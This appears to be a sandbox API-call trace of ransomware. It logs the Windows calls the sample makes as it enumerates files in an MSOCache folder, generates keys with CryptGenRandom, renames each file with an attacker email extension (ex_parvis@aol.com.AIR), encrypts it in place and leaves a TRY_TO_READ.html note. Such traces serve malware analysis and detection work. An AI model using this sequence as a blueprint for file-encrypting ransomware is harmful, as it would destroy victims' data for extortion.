	[0082.397] FindNextFileW (in: hFindFile=0x5da2f0, lpFindFileData=0x3a1f8e0 | out: lpFindFileData=0x3a1f8e0*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0xbd907a00, ftCreationTime.dwHighDateTime=0x1cad04a, ftLastAccessTime.dwLowDateTime=0xbd907a00, ftLastAccessTime.dwHighDateTime=0x1cad04a, ftLastWriteTime.dwLowDateTime=0xee4bb7b0, ftLastWriteTime.dwHighDateTime=0x1d301be, nFileSizeHigh=0x0, nFileSizeLow=0x3e7e1f, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="GrooveLR.cab", cAlternateFileName="")) returned 1
	[0082.397] HeapFree (in: hHeap=0x540000, dwFlags=0x0, lpMem=0x5db0d8 | out: hHeap=0x540000) returned 1
	[0082.397] RtlAllocateHeap (HeapHandle=0x540000, Flags=0x0, Size=0x40) returned 0x5846f0
	[0082.397] RtlAllocateHeap (HeapHandle=0x540000, Flags=0x0, Size=0x80) returned 0x5893c0
	[0082.397] HeapFree (in: hHeap=0x540000, dwFlags=0x0, lpMem=0x5846f0 | out: hHeap=0x540000) returned 1
	[0082.397] GetLastError () returned 0x0
	[0082.397] FindNextFileW (in: hFindFile=0x5da2f0, lpFindFileData=0x3a1f8e0 | out: lpFindFileData=0x3a1f8e0*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0xbd907a00, ftCreationTime.dwHighDateTime=0x1cad04a, ftLastAccessTime.dwLowDateTime=0xbd907a00, ftLastAccessTime.dwHighDateTime=0x1cad04a, ftLastWriteTime.dwLowDateTime=0xee3b15e0, ftLastWriteTime.dwHighDateTime=0x1d301be, nFileSizeHigh=0x0, nFileSizeLow=0x264400, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="GrooveMUI.msi", cAlternateFileName="GROOVE~1.MSI")) returned 1
	[0082.397] HeapFree (in: hHeap=0x540000, dwFlags=0x0, lpMem=0x5db0d8 | out: hHeap=0x540000) returned 1
	[0082.397] RtlAllocateHeap (HeapHandle=0x540000, Flags=0x0, Size=0x40) returned 0x5846f0
	[0082.397] RtlAllocateHeap (HeapHandle=0x540000, Flags=0x0, Size=0x80) returned 0x5893c0
	[0082.397] HeapFree (in: hHeap=0x540000, dwFlags=0x0, lpMem=0x5846f0 | out: hHeap=0x540000) returned 1
	[0082.397] GetLastError () returned 0x0
	[0082.397] FindNextFileW (in: hFindFile=0x5da2f0, lpFindFileData=0x3a1f8e0 | out: lpFindFileData=0x3a1f8e0*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0xbec1a700, ftCreationTime.dwHighDateTime=0x1cad04a, ftLastAccessTime.dwLowDateTime=0xbec1a700, ftLastAccessTime.dwHighDateTime=0x1cad04a, ftLastWriteTime.dwLowDateTime=0xee38cbf0, ftLastWriteTime.dwHighDateTime=0x1d301be, nFileSizeHigh=0x0, nFileSizeLow=0x391, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="GrooveMUI.xml", cAlternateFileName="GROOVE~1.XML")) returned 1
	[0082.397] HeapFree (in: hHeap=0x540000, dwFlags=0x0, lpMem=0x5db0d8 | out: hHeap=0x540000) returned 1
	[0082.397] RtlAllocateHeap (HeapHandle=0x540000, Flags=0x0, Size=0x40) returned 0x5846f0
	[0082.397] RtlAllocateHeap (HeapHandle=0x540000, Flags=0x0, Size=0x80) returned 0x5893c0
	[0082.397] HeapFree (in: hHeap=0x540000, dwFlags=0x0, lpMem=0x5846f0 | out: hHeap=0x540000) returned 1
	[0082.397] GetLastError () returned 0x0
	[0082.397] FindNextFileW (in: hFindFile=0x5da2f0, lpFindFileData=0x3a1f8e0 | out: lpFindFileData=0x3a1f8e0*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0xbec1a700, ftCreationTime.dwHighDateTime=0x1cad04a, ftLastAccessTime.dwLowDateTime=0xbec1a700, ftLastAccessTime.dwHighDateTime=0x1cad04a, ftLastWriteTime.dwLowDateTime=0xee803530, ftLastWriteTime.dwHighDateTime=0x1d301be, nFileSizeHigh=0x0, nFileSizeLow=0x5ac, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Setup.xml", cAlternateFileName="")) returned 1
	[0082.397] HeapFree (in: hHeap=0x540000, dwFlags=0x0, lpMem=0x5db0d8 | out: hHeap=0x540000) returned 1
	[0082.397] RtlAllocateHeap (HeapHandle=0x540000, Flags=0x0, Size=0x40) returned 0x5846f0
	[0082.397] RtlAllocateHeap (HeapHandle=0x540000, Flags=0x0, Size=0x80) returned 0x5893c0
	[0082.397] HeapFree (in: hHeap=0x540000, dwFlags=0x0, lpMem=0x5846f0 | out: hHeap=0x540000) returned 1
	[0082.397] GetLastError () returned 0x0
	[0082.397] FindNextFileW (in: hFindFile=0x5da2f0, lpFindFileData=0x3a1f8e0 | out: lpFindFileData=0x3a1f8e0*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0xc9eeba90, ftCreationTime.dwHighDateTime=0x1d5956c, ftLastAccessTime.dwLowDateTime=0xc9eeba90, ftLastAccessTime.dwHighDateTime=0x1d5956c, ftLastWriteTime.dwLowDateTime=0xc9eeba90, ftLastWriteTime.dwHighDateTime=0x1d5956c, nFileSizeHigh=0x0, nFileSizeLow=0x5bb, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="TRY_TO_READ.html", cAlternateFileName="TRY_TO~1.HTM")) returned 1
	[0082.397] HeapFree (in: hHeap=0x540000, dwFlags=0x0, lpMem=0x5db0d8 | out: hHeap=0x540000) returned 1
	[0082.397] RtlAllocateHeap (HeapHandle=0x540000, Flags=0x0, Size=0x40) returned 0x5846f0
	[0082.397] RtlAllocateHeap (HeapHandle=0x540000, Flags=0x0, Size=0x80) returned 0x5893c0
	[0082.397] HeapFree (in: hHeap=0x540000, dwFlags=0x0, lpMem=0x5846f0 | out: hHeap=0x540000) returned 1
	[0082.397] GetLastError () returned 0x0
	[0082.397] FindNextFileW (in: hFindFile=0x5da2f0, lpFindFileData=0x3a1f8e0 | out: lpFindFileData=0x3a1f8e0*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0xc9eeba90, ftCreationTime.dwHighDateTime=0x1d5956c, ftLastAccessTime.dwLowDateTime=0xc9eeba90, ftLastAccessTime.dwHighDateTime=0x1d5956c, ftLastWriteTime.dwLowDateTime=0xc9eeba90, ftLastWriteTime.dwHighDateTime=0x1d5956c, nFileSizeHigh=0x0, nFileSizeLow=0x5bb, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="TRY_TO_READ.html", cAlternateFileName="TRY_TO~1.HTM")) returned 0
	[0082.397] RtlAllocateHeap (HeapHandle=0x540000, Flags=0x0, Size=0xa0) returned 0x5fb628
	[0082.397] RtlAllocateHeap (HeapHandle=0x540000, Flags=0x0, Size=0x100) returned 0x5b8460
	[0082.398] RtlAllocateHeap (HeapHandle=0x540000, Flags=0x0, Size=0x8) returned 0x5967c0
	[0082.398] CryptGenRandom (in: hProv=0x588c50, dwLen=0x20, pbBuffer=0x5b8460 | out: pbBuffer=0x5b8460) returned 1
	[0082.398] CryptGenRandom (in: hProv=0x588c50, dwLen=0x8, pbBuffer=0x5967c0 | out: pbBuffer=0x5967c0) returned 1
	[0082.398] SetFileAttributesW (lpFileName="C:\\\\MSOCache\\All Users\\{90140000-00BA-0409-1000-0000000FF1CE}-C\\Setup.xml", dwFileAttributes=0x80) returned 1
	[0082.400] lstrlenW (lpString="C:\\\\MSOCache\\All Users\\{90140000-00BA-0409-1000-0000000FF1CE}-C\\Setup.xml") returned 73
	[0082.400] GetProcessHeap () returned 0x540000
	[0082.400] RtlAllocateHeap (HeapHandle=0x540000, Flags=0x0, Size=0xf8) returned 0x5fb6d0
	[0082.400] lstrcpyW (in: lpString1=0x5fb6d0, lpString2="C:\\\\MSOCache\\All Users\\{90140000-00BA-0409-1000-0000000FF1CE}-C\\Setup.xml" | out: lpString1="C:\\\\MSOCache\\All Users\\{90140000-00BA-0409-1000-0000000FF1CE}-C\\Setup.xml") returned="C:\\\\MSOCache\\All Users\\{90140000-00BA-0409-1000-0000000FF1CE}-C\\Setup.xml"
	[0082.400] lstrcatW (in: lpString1="C:\\\\MSOCache\\All Users\\{90140000-00BA-0409-1000-0000000FF1CE}-C\\Setup.xml", lpString2=".12781717671972518758.ex_parvis@aol.com.AIR" | out: lpString1="C:\\\\MSOCache\\All Users\\{90140000-00BA-0409-1000-0000000FF1CE}-C\\Setup.xml.12781717671972518758.ex_parvis@aol.com.AIR") returned="C:\\\\MSOCache\\All Users\\{90140000-00BA-0409-1000-0000000FF1CE}-C\\Setup.xml.12781717671972518758.ex_parvis@aol.com.AIR"
	[0082.400] MoveFileExW (lpExistingFileName="C:\\\\MSOCache\\All Users\\{90140000-00BA-0409-1000-0000000FF1CE}-C\\Setup.xml" (normalized: "c:\\msocache\\all users\\{90140000-00ba-0409-1000-0000000ff1ce}-c\\setup.xml"), lpNewFileName="C:\\\\MSOCache\\All Users\\{90140000-00BA-0409-1000-0000000FF1CE}-C\\Setup.xml.12781717671972518758.ex_parvis@aol.com.AIR" (normalized: "c:\\msocache\\all users\\{90140000-00ba-0409-1000-0000000ff1ce}-c\\setup.xml.12781717671972518758.ex_parvis@aol.com.air"), dwFlags=0x8) returned 1
	[0082.402] CreateFileW (lpFileName="C:\\\\MSOCache\\All Users\\{90140000-00BA-0409-1000-0000000FF1CE}-C\\Setup.xml.12781717671972518758.ex_parvis@aol.com.AIR" (normalized: "c:\\msocache\\all users\\{90140000-00ba-0409-1000-0000000ff1ce}-c\\setup.xml.12781717671972518758.ex_parvis@aol.com.air"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x488
	[0082.402] GetProcessHeap () returned 0x540000
	[0082.402] HeapFree (in: hHeap=0x540000, dwFlags=0x0, lpMem=0x5fb6d0 | out: hHeap=0x540000) returned 1
	[0082.402] GetFileSizeEx (in: hFile=0x488, lpFileSize=0x3a1f73c | out: lpFileSize=0x3a1f73c*=1452) returned 1
	[0082.402] SetFilePointer (in: hFile=0x488, lDistanceToMove=0, lpDistanceToMoveHigh=0x3a1f758*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x3a1f758*=0) returned 0x5ac
	[0082.403] CryptEncrypt (in: hKey=0x574ea0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x3a1f774*=0x20, dwBufLen=0x20 | out: pbData=0x0*, pdwDataLen=0x3a1f774*=0x100) returned 1
	[0082.403] GetProcessHeap () returned 0x540000
	[0082.403] RtlAllocateHeap (HeapHandle=0x540000, Flags=0x8, Size=0x100) returned 0x5b8568
	[0082.403] CryptEncrypt (in: hKey=0x574ea0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x5b8568*, pdwDataLen=0x3a1f764*=0x20, dwBufLen=0x100 | out: pbData=0x5b8568*, pdwDataLen=0x3a1f764*=0x100) returned 1
	[0082.403] WriteFile (in: hFile=0x488, lpBuffer=0x5b8568*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x3a1f778, lpOverlapped=0x0 | out: lpBuffer=0x5b8568*, lpNumberOfBytesWritten=0x3a1f778*=0x100, lpOverlapped=0x0) returned 1
	[0082.404] WriteFile (in: hFile=0x488, lpBuffer=0x5967c0*, nNumberOfBytesToWrite=0x8, lpNumberOfBytesWritten=0x3a1f778, lpOverlapped=0x0 | out: lpBuffer=0x5967c0*, lpNumberOfBytesWritten=0x3a1f778*=0x8, lpOverlapped=0x0) returned 1
	[0082.405] WriteFile (in: hFile=0x488, lpBuffer=0x5967c0*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x3a1f778, lpOverlapped=0x0 | out: lpBuffer=0x5967c0*, lpNumberOfBytesWritten=0x3a1f778*=0x4, lpOverlapped=0x0) returned 1
	[0082.405] RtlAllocateHeap (HeapHandle=0x540000, Flags=0x0, Size=0x5ac) returned 0x5fb6d0
	[0082.405] RtlAllocateHeap (HeapHandle=0x540000, Flags=0x0, Size=0x5ac) returned 0x5fbc88
	[0082.405] SetFilePointer (in: hFile=0x488, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0
	[0082.405] ReadFile (in: hFile=0x488, lpBuffer=0x5fb6d0, nNumberOfBytesToRead=0x5ac, lpNumberOfBytesRead=0x3a1f778, lpOverlapped=0x0 | out: lpBuffer=0x5fb6d0*, lpNumberOfBytesRead=0x3a1f778*=0x5ac, lpOverlapped=0x0) returned 1
	[0082.405] SetFilePointer (in: hFile=0x488, lDistanceToMove=-1452, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x0
	[0082.405] WriteFile (in: hFile=0x488, lpBuffer=0x5fbc88*, nNumberOfBytesToWrite=0x5ac, lpNumberOfBytesWritten=0x3a1f778, lpOverlapped=0x0 | out: lpBuffer=0x5fbc88*, lpNumberOfBytesWritten=0x3a1f778*=0x5ac, lpOverlapped=0x0) returned 1
	[0082.405] HeapFree (in: hHeap=0x540000, dwFlags=0x0, lpMem=0x5fb6d0 | out: hHeap=0x540000) returned 1
	[0082.405] HeapFree (in: hHeap=0x540000, dwFlags=0x0, lpMem=0x5fbc88 | out: hHeap=0x540000) returned 1
	[0082.405] CloseHandle (hObject=0x488) returned 1
	[0082.406] GetProcessHeap () returned 0x540000
	[0082.406] HeapFree (in: hHeap=0x540000, dwFlags=0x0, lpMem=0x5b8568 | out: hHeap=0x540000) returned 1
	[0082.406] HeapFree (in: hHeap=0x540000, dwFlags=0x0, lpMem=0x5b8460 | out: hHeap=0x540000) returned 1
	[0082.406] HeapFree (in: hHeap=0x540000, dwFlags=0x0, lpMem=0x5967c0 | out: hHeap=0x540000) returned 1
	[0082.406] HeapFree (in: hHeap=0x540000, dwFlags=0x0, lpMem=0x5fb628 | out: hHeap=0x540000) returned 1
	[0082.406] HeapFree (in: hHeap=0x540000, dwFlags=0x0, lpMem=0x5fb580 | out: hHeap=0x540000) returned 1
	[0082.406] RtlAllocateHeap (HeapHandle=0x540000, Flags=0x0, Size=0xa0) returned 0x5fb580
	[0082.406] RtlAllocateHeap (HeapHandle=0x540000, Flags=0x0, Size=0x100) returned 0x5b8460
	[0082.406] RtlAllocateHeap (HeapHandle=0x540000, Flags=0x0, Size=0x8) returned 0x5967c0
	[0082.406] CryptGenRandom (in: hProv=0x588c50, dwLen=0x20, pbBuffer=0x5b8460 | out: pbBuffer=0x5b8460) returned 1
	[0082.406] CryptGenRandom (in: hProv=0x588c50, dwLen=0x8, pbBuffer=0x5967c0 | out: pbBuffer=0x5967c0) returned 1
	[0082.406] SetFileAttributesW (lpFileName="C:\\\\MSOCache\\All Users\\{90140000-00BA-0409-1000-0000000FF1CE}-C\\GrooveMUI.xml", dwFileAttributes=0x80) returned 1
	[0082.406] lstrlenW (lpString="C:\\\\MSOCache\\All Users\\{90140000-00BA-0409-1000-0000000FF1CE}-C\\GrooveMUI.xml") returned 77
	[0082.406] GetProcessHeap () returned 0x540000
	[0082.407] RtlAllocateHeap (HeapHandle=0x540000, Flags=0x0, Size=0x100) returned 0x5b8568
	[0082.407] lstrcpyW (in: lpString1=0x5b8568, lpString2="C:\\\\MSOCache\\All Users\\{90140000-00BA-0409-1000-0000000FF1CE}-C\\GrooveMUI.xml" | out: lpString1="C:\\\\MSOCache\\All Users\\{90140000-00BA-0409-1000-0000000FF1CE}-C\\GrooveMUI.xml") returned="C:\\\\MSOCache\\All Users\\{90140000-00BA-0409-1000-0000000FF1CE}-C\\GrooveMUI.xml"
	[0082.407] lstrcatW (in: lpString1="C:\\\\MSOCache\\All Users\\{90140000-00BA-0409-1000-0000000FF1CE}-C\\GrooveMUI.xml", lpString2=".12781717671972518758.ex_parvis@aol.com.AIR" | out: lpString1="C:\\\\MSOCache\\All Users\\{90140000-00BA-0409-1000-0000000FF1CE}-C\\GrooveMUI.xml.12781717671972518758.ex_parvis@aol.com.AIR") returned="C:\\\\MSOCache\\All Users\\{90140000-00BA-0409-1000-0000000FF1CE}-C\\GrooveMUI.xml.12781717671972518758.ex_parvis@aol.com.AIR"
	[0082.407] MoveFileExW (lpExistingFileName="C:\\\\MSOCache\\All Users\\{90140000-00BA-0409-1000-0000000FF1CE}-C\\GrooveMUI.xml" (normalized: "c:\\msocache\\all users\\{90140000-00ba-0409-1000-0000000ff1ce}-c\\groovemui.xml"), lpNewFileName="C:\\\\MSOCache\\All Users\\{90140000-00BA-0409-1000-0000000FF1CE}-C\\GrooveMUI.xml.12781717671972518758.ex_parvis@aol.com.AIR" (normalized: "c:\\msocache\\all users\\{90140000-00ba-0409-1000-0000000ff1ce}-c\\groovemui.xml.12781717671972518758.ex_parvis@aol.com.air"), dwFlags=0x8) returned 1
	[0082.409] CreateFileW (lpFileName="C:\\\\MSOCache\\All Users\\{90140000-00BA-0409-1000-0000000FF1CE}-C\\GrooveMUI.xml.12781717671972518758.ex_parvis@aol.com.AIR" (normalized: "c:\\msocache\\all users\\{90140000-00ba-0409-1000-0000000ff1ce}-c\\groovemui.xml.12781717671972518758.ex_parvis@aol.com.air"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x488
	[0082.409] GetProcessHeap () returned 0x540000
	[0082.409] HeapFree (in: hHeap=0x540000, dwFlags=0x0, lpMem=0x5b8568 | out: hHeap=0x540000) returned 1
	[0082.409] GetFileSizeEx (in: hFile=0x488, lpFileSize=0x3a1f73c | out: lpFileSize=0x3a1f73c*=913) returned 1
	[0082.409] SetFilePointer (in: hFile=0x488, lDistanceToMove=0, lpDistanceToMoveHigh=0x3a1f758*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x3a1f758*=0) returned 0x391
	[0082.409] CryptEncrypt (in: hKey=0x574ea0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x3a1f774*=0x20, dwBufLen=0x20 | out: pbData=0x0*, pdwDataLen=0x3a1f774*=0x100) returned 1
	[0082.409] GetProcessHeap () returned 0x540000
	[0082.409] RtlAllocateHeap (HeapHandle=0x540000, Flags=0x8, Size=0x100) returned 0x5b8568
	[0082.409] CryptEncrypt (in: hKey=0x574ea0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x5b8568*, pdwDataLen=0x3a1f764*=0x20, dwBufLen=0x100 | out: pbData=0x5b8568*, pdwDataLen=0x3a1f764*=0x100) returned 1
	[0082.409] WriteFile (in: hFile=0x488, lpBuffer=0x5b8568*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x3a1f778, lpOverlapped=0x0 | out: lpBuffer=0x5b8568*, lpNumberOfBytesWritten=0x3a1f778*=0x100, lpOverlapped=0x0) returned 1
	[0082.411] WriteFile (in: hFile=0x488, lpBuffer=0x5967c0*, nNumberOfBytesToWrite=0x8, lpNumberOfBytesWritten=0x3a1f778, lpOverlapped=0x0 | out: lpBuffer=0x5967c0*, lpNumberOfBytesWritten=0x3a1f778*=0x8, lpOverlapped=0x0) returned 1
	[0082.411] WriteFile (in: hFile=0x488, lpBuffer=0x5967c0*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x3a1f778, lpOverlapped=0x0 | out: lpBuffer=0x5967c0*, lpNumberOfBytesWritten=0x3a1f778*=0x4, lpOverlapped=0x0) returned 1
	[0082.411] RtlAllocateHeap (HeapHandle=0x540000, Flags=0x0, Size=0x391) returned 0x5fb628
	[0082.411] RtlAllocateHeap (HeapHandle=0x540000, Flags=0x0, Size=0x391) returned 0x5fb9c8
	[0082.411] SetFilePointer (in: hFile=0x488, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0
	[0082.411] ReadFile (in: hFile=0x488, lpBuffer=0x5fb628, nNumberOfBytesToRead=0x391, lpNumberOfBytesRead=0x3a1f778, lpOverlapped=0x0 | out: lpBuffer=0x5fb628*, lpNumberOfBytesRead=0x3a1f778*=0x391, lpOverlapped=0x0) returned 1
	[0082.411] SetFilePointer (in: hFile=0x488, lDistanceToMove=-913, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x0
	[0082.411] WriteFile (in: hFile=0x488, lpBuffer=0x5fb9c8*, nNumberOfBytesToWrite=0x391, lpNumberOfBytesWritten=0x3a1f778, lpOverlapped=0x0 | out: lpBuffer=0x5fb9c8*, lpNumberOfBytesWritten=0x3a1f778*=0x391, lpOverlapped=0x0) returned 1
	[0082.411] HeapFree (in: hHeap=0x540000, dwFlags=0x0, lpMem=0x5fb628 | out: hHeap=0x540000) returned 1
	[0082.411] HeapFree (in: hHeap=0x540000, dwFlags=0x0, lpMem=0x5fb9c8 | out: hHeap=0x540000) returned 1
	[0082.411] CloseHandle (hObject=0x488) returned 1
	[0082.412] GetProcessHeap () returned 0x540000
	[0082.412] HeapFree (in: hHeap=0x540000, dwFlags=0x0, lpMem=0x5b8568 | out: hHeap=0x540000) returned 1
	[0082.412] HeapFree (in: hHeap=0x540000, dwFlags=0x0, lpMem=0x5b8460 | out: hHeap=0x540000) returned 1
	[0082.412] HeapFree (in: hHeap=0x540000, dwFlags=0x0, lpMem=0x5967c0 | out: hHeap=0x540000) returned 1
	[0082.412] HeapFree (in: hHeap=0x540000, dwFlags=0x0, lpMem=0x5fb580 | out: hHeap=0x540000) returned 1
	[0082.412] HeapFree (in: hHeap=0x540000, dwFlags=0x0, lpMem=0x5fb4d8 | out: hHeap=0x540000) returned 1
	[0082.412] RtlAllocateHeap (HeapHandle=0x540000, Flags=0x0, Size=0xa0) returned 0x5fb4d8
	[0082.412] RtlAllocateHeap (HeapHandle=0x540000, Flags=0x0, Size=0x100) returned 0x5b8460
	[0082.412] RtlAllocateHeap (HeapHandle=0x540000, Flags=0x0, Size=0x8) returned 0x5967c0
	[0082.412] CryptGenRandom (in: hProv=0x588c50, dwLen=0x20, pbBuffer=0x5b8460 | out: pbBuffer=0x5b8460) returned 1
	[0082.412] CryptGenRandom (in: hProv=0x588c50, dwLen=0x8, pbBuffer=0x5967c0 | out: pbBuffer=0x5967c0) returned 1
	[0082.412] SetFileAttributesW (lpFileName="C:\\\\MSOCache\\All Users\\{90140000-00BA-0409-1000-0000000FF1CE}-C\\GrooveMUI.msi", dwFileAttributes=0x80) returned 1
	[0082.412] lstrlenW (lpString="C:\\\\MSOCache\\All Users\\{90140000-00BA-0409-1000-0000000FF1CE}-C\\GrooveMUI.msi") returned 77
	[0082.412] GetProcessHeap () returned 0x540000
	[0082.412] RtlAllocateHeap (HeapHandle=0x540000, Flags=0x0, Size=0x100) returned 0x5b8568
	[0082.413] lstrcpyW (in: lpString1=0x5b8568, lpString2="C:\\\\MSOCache\\All Users\\{90140000-00BA-0409-1000-0000000FF1CE}-C\\GrooveMUI.msi" | out: lpString1="C:\\\\MSOCache\\All Users\\{90140000-00BA-0409-1000-0000000FF1CE}-C\\GrooveMUI.msi") returned="C:\\\\MSOCache\\All Users\\{90140000-00BA-0409-1000-0000000FF1CE}-C\\GrooveMUI.msi"
	[0082.413] lstrcatW (in: lpString1="C:\\\\MSOCache\\All Users\\{90140000-00BA-0409-1000-0000000FF1CE}-C\\GrooveMUI.msi", lpString2=".12781717671972518758.ex_parvis@aol.com.AIR" | out: lpString1="C:\\\\MSOCache\\All Users\\{90140000-00BA-0409-1000-0000000FF1CE}-C\\GrooveMUI.msi.12781717671972518758.ex_parvis@aol.com.AIR") returned="C:\\\\MSOCache\\All Users\\{90140000-00BA-0409-1000-0000000FF1CE}-C\\GrooveMUI.msi.12781717671972518758.ex_parvis@aol.com.AIR"
	[0082.413] MoveFileExW (lpExistingFileName="C:\\\\MSOCache\\All Users\\{90140000-00BA-0409-1000-0000000FF1CE}-C\\GrooveMUI.msi" (normalized: "c:\\msocache\\all users\\{90140000-00ba-0409-1000-0000000ff1ce}-c\\groovemui.msi"), lpNewFileName="C:\\\\MSOCache\\All Users\\{90140000-00BA-0409-1000-0000000FF1CE}-C\\GrooveMUI.msi.12781717671972518758.ex_parvis@aol.com.AIR" (normalized: "c:\\msocache\\all users\\{90140000-00ba-0409-1000-0000000ff1ce}-c\\groovemui.msi.12781717671972518758.ex_parvis@aol.com.air"), dwFlags=0x8) returned 1
	[0082.415] CreateFileW (lpFileName="C:\\\\MSOCache\\All Users\\{90140000-00BA-0409-1000-0000000FF1CE}-C\\GrooveMUI.msi.12781717671972518758.ex_parvis@aol.com.AIR" (normalized: "c:\\msocache\\all users\\{90140000-00ba-0409-1000-0000000ff1ce}-c\\groovemui.msi.12781717671972518758.ex_parvis@aol.com.air"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x488
	[0082.415] GetProcessHeap () returned 0x540000
	[0082.415] HeapFree (in: hHeap=0x540000, dwFlags=0x0, lpMem=0x5b8568 | out: hHeap=0x540000) returned 1
	[0082.415] GetFileSizeEx (in: hFile=0x488, lpFileSize=0x3a1f73c | out: lpFileSize=0x3a1f73c*=2507776) returned 1
	[0082.415] SetFilePointer (in: hFile=0x488, lDistanceToMove=0, lpDistanceToMoveHigh=0x3a1f758*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x3a1f758*=0) returned 0x264400
	[0082.415] CryptEncrypt (in: hKey=0x574ea0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x3a1f774*=0x20, dwBufLen=0x20 | out: pbData=0x0*, pdwDataLen=0x3a1f774*=0x100) returned 1
	[0082.415] GetProcessHeap () returned 0x540000
	[0082.415] RtlAllocateHeap (HeapHandle=0x540000, Flags=0x8, Size=0x100) returned 0x5b8568
	[0082.415] CryptEncrypt (in: hKey=0x574ea0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x5b8568*, pdwDataLen=0x3a1f764*=0x20, dwBufLen=0x100 | out: pbData=0x5b8568*, pdwDataLen=0x3a1f764*=0x100) returned 1
	[0082.415] WriteFile (in: hFile=0x488, lpBuffer=0x5b8568*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x3a1f778, lpOverlapped=0x0 | out: lpBuffer=0x5b8568*, lpNumberOfBytesWritten=0x3a1f778*=0x100, lpOverlapped=0x0) returned 1
	[0082.417] WriteFile (in: hFile=0x488, lpBuffer=0x5967c0*, nNumberOfBytesToWrite=0x8, lpNumberOfBytesWritten=0x3a1f778, lpOverlapped=0x0 | out: lpBuffer=0x5967c0*, lpNumberOfBytesWritten=0x3a1f778*=0x8, lpOverlapped=0x0) returned 1
	[0082.417] WriteFile (in: hFile=0x488, lpBuffer=0x5967c0*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x3a1f778, lpOverlapped=0x0 | out: lpBuffer=0x5967c0*, lpNumberOfBytesWritten=0x3a1f778*=0x4, lpOverlapped=0x0) returned 1
	[0082.417] RtlAllocateHeap (HeapHandle=0x540000, Flags=0x0, Size=0x264400) returned 0x3a20020
	[0082.417] RtlAllocateHeap (HeapHandle=0x540000, Flags=0x0, Size=0x264400) returned 0x3c90020
	[0082.418] SetFilePointer (in: hFile=0x488, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0
	[0082.418] ReadFile (in: hFile=0x488, lpBuffer=0x3a20020, nNumberOfBytesToRead=0x264400, lpNumberOfBytesRead=0x3a1f778, lpOverlapped=0x0 | out: lpBuffer=0x3a20020*, lpNumberOfBytesRead=0x3a1f778*=0x264400, lpOverlapped=0x0) returned 1
	[0082.571] CryptGenRandom (in: hProv=0x588c50, dwLen=0x20, pbBuffer=0x5b8460 | out: pbBuffer=0x5b8460) returned 1
	[0082.571] CryptGenRandom (in: hProv=0x588c50, dwLen=0x8, pbBuffer=0x5967c0 | out: pbBuffer=0x5967c0) returned 1
	[0082.571] SetFileAttributesW (lpFileName="C:\\\\MSOCache\\All Users\\{90140000-00BA-0409-1000-0000000FF1CE}-C\\GrooveLR.cab", dwFileAttributes=0x80) returned 1
	[0082.572] lstrlenW (lpString="C:\\\\MSOCache\\All Users\\{90140000-00BA-0409-1000-0000000FF1CE}-C\\GrooveLR.cab") returned 76
	[0082.572] GetProcessHeap () returned 0x540000
	[0082.572] RtlAllocateHeap (HeapHandle=0x540000, Flags=0x0, Size=0xfe) returned 0x5b8568
	[0082.572] lstrcpyW (in: lpString1=0x5b8568, lpString2="C:\\\\MSOCache\\All Users\\{90140000-00BA-0409-1000-0000000FF1CE}-C\\GrooveLR.cab" | out: lpString1="C:\\\\MSOCache\\All Users\\{90140000-00BA-0409-1000-0000000FF1CE}-C\\GrooveLR.cab") returned="C:\\\\MSOCache\\All Users\\{90140000-00BA-0409-1000-0000000FF1CE}-C\\GrooveLR.cab"
	[0082.572] lstrcatW (in: lpString1="C:\\\\MSOCache\\All Users\\{90140000-00BA-0409-1000-0000000FF1CE}-C\\GrooveLR.cab", lpString2=".12781717671972518758.ex_parvis@aol.com.AIR" | out: lpString1="C:\\\\MSOCache\\All Users\\{90140000-00BA-0409-1000-0000000FF1CE}-C\\GrooveLR.cab.12781717671972518758.ex_parvis@aol.com.AIR") returned="C:\\\\MSOCache\\All Users\\{90140000-00BA-0409-1000-0000000FF1CE}-C\\GrooveLR.cab.12781717671972518758.ex_parvis@aol.com.AIR"
